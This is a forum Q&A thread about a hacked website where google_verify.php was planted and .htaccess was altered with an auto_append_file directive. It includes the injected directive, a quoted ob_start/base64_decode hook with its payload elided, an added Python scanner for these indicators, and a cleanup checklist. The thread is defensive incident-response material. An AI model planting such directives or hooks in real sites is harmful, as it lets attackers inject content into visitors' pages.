
virus problem google_verify.php and ftp passwords

A couple of days ago I had problems with my sites. On all FTP servers I got a PHP file called google_verify.php, and the following text was added to my .htaccess file:

     <IfModule mod_php5.c>
     php_value auto_append_file "google_verify.php"
     </IfModule>

     <IfModule mod_php4.c>
     php_value auto_append_file "google_verify.php"
     </IfModule>

Here is google_verify.php file:


I suspect that my PC is infected with some kind of virus that can read my FTP access parameters from my FTP manager.

Does anybody know something more about this virus and how I can clean my computer?

Thanks in advance

kukipei asked Jul 13 '11 22:07


2 Answers

I am no security specialist, but one of my sites got the same file. From my limited knowledge and research, what happened is that your site got hacked and the google_verify.php file is part of an injection attack.

You should also check other files of your website (especially the index.php/htm/html) and look for:

     ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('...');}

It seems that this virus/malware is affecting several CMS such as Joomla, WordPress, CodeIgniter, etc. Some more info here and here.

obaqueiro answered Oct 24 '22 02:10
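
The indicators named in the question and in the answer above (the `auto_append_file` directive in `.htaccess`, the file it points to, and the `ob_start("security_update")` hook with `base64_decode`) can be swept for across a whole document root. This is an added example, not code from the original posts; the names `scan_webroot` and `demo` and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
# Indicators quoted in the posts above: the injected .htaccess directive and the
# output-buffer callback that appends a base64-decoded string to every page.
DIRECTIVE_RE = re.compile(
    r'^\s*php_(?:admin_)?value\s+(auto_(?:append|prepend)_file)\s+"?([^"\s]+)"?',
    re.I | re.M)
HOOK_RE = re.compile(r'ob_start\s*\(\s*["\'](\w+)["\']\s*\)')
B64_RE = re.compile(r'base64_decode\s*\(')
SCAN_EXT = {".php", ".htm", ".html"}

def _rel(path, root):
    try:
        return path.relative_to(root).as_posix()
    except ValueError:  # directive pointed outside the scanned tree
        return str(path)

def scan_webroot(root):
    """Return sorted (path, reason) findings for the indicators above."""
    root, findings = Path(root), set()
    for path in root.rglob("*"):
        if path.name == ".htaccess" and path.is_file():
            text = path.read_text(errors="replace")
            for directive, target in DIRECTIVE_RE.findall(text):
                findings.add((_rel(path, root), f"{directive} -> {target}"))
                appended = path.parent / target  # bare filename, as in the post
                if appended.is_file():
                    findings.add((_rel(appended, root), "referenced by .htaccess"))
        elif path.suffix.lower() in SCAN_EXT and path.is_file():
            text = path.read_text(errors="replace")
            hook = HOOK_RE.search(text)
            if hook and B64_RE.search(text):
                findings.add((_rel(path, root), f"ob_start('{hook.group(1)}') + base64_decode"))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (stand-in content, not real site data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".htaccess").write_text(
            '<IfModule mod_php5.c>\nphp_value auto_append_file "google_verify.php"\n</IfModule>\n')
        (root / "google_verify.php").write_text("<script>/* constructed stand-in */</script>\n")
        (root / "index.php").write_text(
            '<?php ob_start("security_update"); function security_update($buffer)'
            "{return $buffer.base64_decode('Y29uc3RydWN0ZWQ=');} ?>\n")
        (root / "clean.php").write_text("<?php echo 'hello'; ?>\n")
        return scan_webroot(root)
```

Run `scan_webroot` against a downloaded copy of the site and review each finding by hand; a legitimate `ob_start` callback combined with `base64_decode` will also be reported.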


Best course of action:

  • change ALL ftp and username passwords QUICKLY
  • uninstall all FTP program(s) on your pc
  • run virus scan & malware scan
  • make sure your pc is clean
  • reinstall FTP client (clean install - download new version of software)

Now to clean your WP website:

  • install WP plugins (tac, exploit scanner)
  • run plugins
  • note infected files
  • use FTP or WP plugin editor to clean these files
  • run exploit scanner & tac till website is clean

Hope this helps...

Bobby answered Oct 24 '22 04:10